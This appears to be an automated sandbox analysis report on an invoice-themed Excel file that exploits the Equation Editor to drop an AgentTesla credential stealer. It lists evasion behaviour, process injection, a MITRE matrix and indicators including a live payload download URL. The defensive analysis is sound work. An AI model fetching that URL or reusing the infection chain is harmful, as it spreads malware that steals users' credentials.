                Source: vbc.exe.4.dr, gpprQs1JTfKY43huFu/FX6iCHA7LM8aIR8xSD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'AinK8bq2yu', 'zUKmlCri3a', 'Bgpmwss4W8', 'HmjmupSYqs', 'c59mOLHwKl', 'H4gmVXsG3m', 'CkpmbC96WM', 'oNam6TVq6p'
                Source: vbc.exe.4.dr, yyI5uhmlZql1NXDJdB/ijoMm5rxdPnqdfLa2F.csHigh entropy of concatenated method names: 'NJYoeUuyln', 'sdQo9JjuCk', 'mQqoGYusu5', 'a6towU9NfQ', 'j96oB2V5CW', 'zrho2ehmSP', 'igIo4t7X4l', 'Hfhoqn1LKo', 'XPEotfFa3E', 'nyEolE546H'
                Source: vbc.exe.4.dr, sIiWtTsZOy3ymXKnDM/JLLJRtUXaCaWrPg6HW.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'h9kdMWng5s', 'lhkQNO1OVB', 'DWdQLT5a9Q', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'We5vvBDwjk'
                Source: vbc.exe.4.dr, Qu6SICHw3A4mPVjAWP/jhR0vSPbuV7axYFEin.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'eDnd8BQBBZ', 'oejdQlRVXK', 'jlmdjD3r74', 't3fdX1CHfH', 'iFAd4uSimN', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU'
                Source: vbc.exe.4.dr, YlSuYQRHSxRhPJwg0s/EL5ZuhuBsUedVLCe47.csHigh entropy of concatenated method names: 's8qVZbC8tq', 'WgyVJmgmfp', 'ed6V1VSdb8', 'mvtVhM7Zba', 'uWmVN7gS2R', 'Fq2VpoJp8p', 'PcpVPa6D4N', 'dClVHbN2io', 'cMOVskAh69', 'ckYVfZmUOk'
                Source: vbc.exe.4.dr, Jawtflp0qcAQxEfLDu/mRmUotNwtL1tX0xfpi.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'Y3vOvekntU', 'uURvT8k6iY', 'UqDvzkHbQZ', 'jEkQg7jO4O', 'ICAQer9Nm0', 'af9QyZ0r7u', 'FqpQ06hfRQ', 'CQTQYL6yeT'
                Source: vbc.exe.4.dr, Nn8lq6qXoiQOmnkFjd/ph3i2r2ZpugBVdcTRF.csHigh entropy of concatenated method names: 'RJT5rfKY43', 'LuF5musSm6', 'dnl532d7C8', 'tQ75CRtLdG', 'BUo5utwtL1', 'lX05RxfpiJ', 'awt5Ifl0qc', 'KQx5EEfLDu', 'c7a5JxYFEi', 'pHu5A6SICw'
                Source: vbc.exe.4.dr, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.csHigh entropy of concatenated method names: 'E62cmi1mr2', 'zk6cu701cO', 'hkfcRu6tGh', '.ctor', '.ctor', 'YHZcYLZHOd', 'tsXc3aHNDv', 'OffcCVf2R9', 'owMcMYdHmV', 'WEQahG1D4mkQl6JHEL2'
                Source: vbc.exe.4.dr, q1IUAUDwsWbplMEoQF/HsN3gxfes6Rv157qSv.csHigh entropy of concatenated method names: '.ctor', 'Tnhc5Ut6V9', 'O0ocoWEmfr', 'loCcVYeBVS', 'kj4cKMhw1w', 'ejqcOV6i0e', 'pvrcdUqJfo', 'SY6dRvIzG297TILfElI', 'jLhcHH1o0iKvI3qO4OA', 'pORp8VIiNhnGUL8R3XA'
                Source: vbc.exe.4.dr, YAE3O3JXw2wpfdXcfJ/LlJn3uZpU8RWafXNOV.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'EEhmpNBWOF', 'mQfm2X2uUR', 'lTWmZeuBxU', 'B6SmWTrawQ', 'muEmPau0s8', 'DJJmnK1SHX', 'RnEmsb7cLj', 'GtPmaaH5iO'
                Source: vbc.exe.4.dr, obWUh6Cb9BqRvavWXw/lOTTtm3pgdvAnULHLr.csHigh entropy of concatenated method names: 'w1xVgN0Jsy', 'dKmVWLdg6f', 'LCdV6EPlXj', 'ciXVnI2Mdm', 'EfBVe3gYLM', 'dCtV9Exve3', 'MGqVLVJrk9', 'WYaVGTgx9V', 'GtiVwhnFLW', 'dlFVT6RCdy'
                Source: vbc.exe.4.dr, XPEfFa5V3Es49PEcfY5/bNPoP65oL7XjgIt7X4l.csHigh entropy of concatenated method names: '.ctor', 'q8tcf8mQYy', 'KENcDogZaD', 'oUFcvURfc4', 'J2WcFbEkWn', 'CuUc0wmapc', 'xFScxAenFI', 'z49c70yUiS', 'iMCcbUOx4l', 'ueTczCI0Om'
                Source: vbc.exe.4.dr, Toc3gZ55Ds3ykoTkkT4/A0PiG55aXVGg1GhxwAg.csHigh entropy of concatenated method names: 'Dispose', 'Es2cSPvwhn', 'IoHcNfRLkU', 'GrgcpiH89b', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'aJtoyu1dUBYUqHoSHQY', 'kGjBTe1Yfd5fFFj0Hle'
                Source: 6.0.vbc.exe.ec0000.0.unpack, XC8LQ7SRtLdGVTj875/RSm6LshekR3eiKnl2d.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'BCpK0qHUG6', 'AbOK6vXIcg', 'QoJKB4Rw0e', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'OZ4KTFK59K'
                Source: 6.0.vbc.exe.ec0000.0.unpack, gpprQs1JTfKY43huFu/FX6iCHA7LM8aIR8xSD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'AinK8bq2yu', 'zUKmlCri3a', 'Bgpmwss4W8', 'HmjmupSYqs', 'c59mOLHwKl', 'H4gmVXsG3m', 'CkpmbC96WM', 'oNam6TVq6p'
                Source: 6.0.vbc.exe.ec0000.0.unpack, yyI5uhmlZql1NXDJdB/ijoMm5rxdPnqdfLa2F.csHigh entropy of concatenated method names: 'NJYoeUuyln', 'sdQo9JjuCk', 'mQqoGYusu5', 'a6towU9NfQ', 'j96oB2V5CW', 'zrho2ehmSP', 'igIo4t7X4l', 'Hfhoqn1LKo', 'XPEotfFa3E', 'nyEolE546H'
                Source: 6.0.vbc.exe.ec0000.0.unpack, sIiWtTsZOy3ymXKnDM/JLLJRtUXaCaWrPg6HW.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'h9kdMWng5s', 'lhkQNO1OVB', 'DWdQLT5a9Q', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'We5vvBDwjk'
                Source: 6.0.vbc.exe.ec0000.0.unpack, Qu6SICHw3A4mPVjAWP/jhR0vSPbuV7axYFEin.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'eDnd8BQBBZ', 'oejdQlRVXK', 'jlmdjD3r74', 't3fdX1CHfH', 'iFAd4uSimN', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU'
                Source: 6.0.vbc.exe.ec0000.0.unpack, Jawtflp0qcAQxEfLDu/mRmUotNwtL1tX0xfpi.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'Y3vOvekntU', 'uURvT8k6iY', 'UqDvzkHbQZ', 'jEkQg7jO4O', 'ICAQer9Nm0', 'af9QyZ0r7u', 'FqpQ06hfRQ', 'CQTQYL6yeT'
                Source: 6.0.vbc.exe.ec0000.0.unpack, Nn8lq6qXoiQOmnkFjd/ph3i2r2ZpugBVdcTRF.csHigh entropy of concatenated method names: 'RJT5rfKY43', 'LuF5musSm6', 'dnl532d7C8', 'tQ75CRtLdG', 'BUo5utwtL1', 'lX05RxfpiJ', 'awt5Ifl0qc', 'KQx5EEfLDu', 'c7a5JxYFEi', 'pHu5A6SICw'
                Source: 6.0.vbc.exe.ec0000.0.unpack, YAE3O3JXw2wpfdXcfJ/LlJn3uZpU8RWafXNOV.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'EEhmpNBWOF', 'mQfm2X2uUR', 'lTWmZeuBxU', 'B6SmWTrawQ', 'muEmPau0s8', 'DJJmnK1SHX', 'RnEmsb7cLj', 'GtPmaaH5iO'
                Source: 6.0.vbc.exe.ec0000.0.unpack, YlSuYQRHSxRhPJwg0s/EL5ZuhuBsUedVLCe47.csHigh entropy of concatenated method names: 's8qVZbC8tq', 'WgyVJmgmfp', 'ed6V1VSdb8', 'mvtVhM7Zba', 'uWmVN7gS2R', 'Fq2VpoJp8p', 'PcpVPa6D4N', 'dClVHbN2io', 'cMOVskAh69', 'ckYVfZmUOk'
                Source: 6.0.vbc.exe.ec0000.0.unpack, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.csHigh entropy of concatenated method names: 'E62cmi1mr2', 'zk6cu701cO', 'hkfcRu6tGh', '.ctor', '.ctor', 'YHZcYLZHOd', 'tsXc3aHNDv', 'OffcCVf2R9', 'owMcMYdHmV', 'WEQahG1D4mkQl6JHEL2'
                Source: 6.0.vbc.exe.ec0000.0.unpack, obWUh6Cb9BqRvavWXw/lOTTtm3pgdvAnULHLr.csHigh entropy of concatenated method names: 'w1xVgN0Jsy', 'dKmVWLdg6f', 'LCdV6EPlXj', 'ciXVnI2Mdm', 'EfBVe3gYLM', 'dCtV9Exve3', 'MGqVLVJrk9', 'WYaVGTgx9V', 'GtiVwhnFLW', 'dlFVT6RCdy'
                Source: 6.0.vbc.exe.ec0000.0.unpack, q1IUAUDwsWbplMEoQF/HsN3gxfes6Rv157qSv.csHigh entropy of concatenated method names: '.ctor', 'Tnhc5Ut6V9', 'O0ocoWEmfr', 'loCcVYeBVS', 'kj4cKMhw1w', 'ejqcOV6i0e', 'pvrcdUqJfo', 'SY6dRvIzG297TILfElI', 'jLhcHH1o0iKvI3qO4OA', 'pORp8VIiNhnGUL8R3XA'
                Source: 6.0.vbc.exe.ec0000.0.unpack, XPEfFa5V3Es49PEcfY5/bNPoP65oL7XjgIt7X4l.csHigh entropy of concatenated method names: '.ctor', 'q8tcf8mQYy', 'KENcDogZaD', 'oUFcvURfc4', 'J2WcFbEkWn', 'CuUc0wmapc', 'xFScxAenFI', 'z49c70yUiS', 'iMCcbUOx4l', 'ueTczCI0Om'
                Source: 6.0.vbc.exe.ec0000.0.unpack, Toc3gZ55Ds3ykoTkkT4/A0PiG55aXVGg1GhxwAg.csHigh entropy of concatenated method names: 'Dispose', 'Es2cSPvwhn', 'IoHcNfRLkU', 'GrgcpiH89b', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'aJtoyu1dUBYUqHoSHQY', 'kGjBTe1Yfd5fFFj0Hle'
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: FACTURA 3879843.xlsxStream path 'EncryptedPackage' entropy: 7.9986477778 (max. 8.0)

                Malware Analysis System Evasion:

                barindex
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9658
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2984Thread sleep time: -300000s >= -30000s
                Source: C:\Users\Public\vbc.exe TID: 2168Thread sleep time: -39208s >= -30000s
                Source: C:\Users\Public\vbc.exe TID: 1260Thread sleep time: -60000s >= -30000s
                Source: C:\Users\Public\vbc.exe TID: 2716Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\Public\vbc.exe TID: 2256Thread sleep time: -360000s >= -30000s
                Source: C:\Users\Public\vbc.exe TID: 2028Thread sleep time: -17524406870024063s >= -30000s
                Source: C:\Users\Public\vbc.exe TID: 2028Thread sleep time: -120000s >= -30000s
                Source: C:\Users\Public\vbc.exe TID: 2108Thread sleep count: 9658 > 30
                Source: C:\Users\Public\vbc.exe TID: 2108Thread sleep count: 74 > 30
                Source: C:\Users\Public\vbc.exe TID: 2028Thread sleep count: 98 > 30
                Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Users\Public\vbc.exeLast function: Thread delayed
                Source: C:\Users\Public\vbc.exeLast function: Thread delayed
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 39208
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 30000
                Source: vbc.exeBinary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
                Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
                Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                Source: vbc.exe, 00000007.00000002.2364238263.0000000000FC0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: vbc.exe, 00000007.00000002.2364238263.0000000000FC0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: vbc.exe, 00000007.00000002.2364238263.0000000000FC0000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1772, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1772, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1772, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Masquerading111OS Credential DumpingSecurity Software Discovery111Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerVirtualization/Sandbox Evasion131SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information11Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                FACTURA 3879843.xlsx30%VirustotalBrowse
                FACTURA 3879843.xlsx28%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exe100%Joe Sandbox ML
                C:\Users\Public\vbc.exe100%Joe Sandbox ML

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                7.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://pcLwYQ.com0%Avira URL Cloudsafe
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://198.12.91.148/oso.exe9%VirustotalBrowse
                http://198.12.91.148/oso.exe0%Avira URL Cloudsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://198.12.91.148/oso.exetrue
                • 9%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://pcLwYQ.comvbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://127.0.0.1:HTTP/1.1vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://DynDns.comDynDNSvbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.%s.comPAvbc.exe, 00000007.00000002.2365402935.0000000005E10000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                low
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000007.00000002.2365402935.0000000005E10000.00000002.00000001.sdmpfalse
                  high
                  http://twitter.com/statuses/user_timeline.xml?screen_name=vbc.exe, vbc.exe, 00000007.00000002.2364130340.0000000000EC2000.00000020.00020000.sdmp, oso[1].exe.4.drfalse
                    high
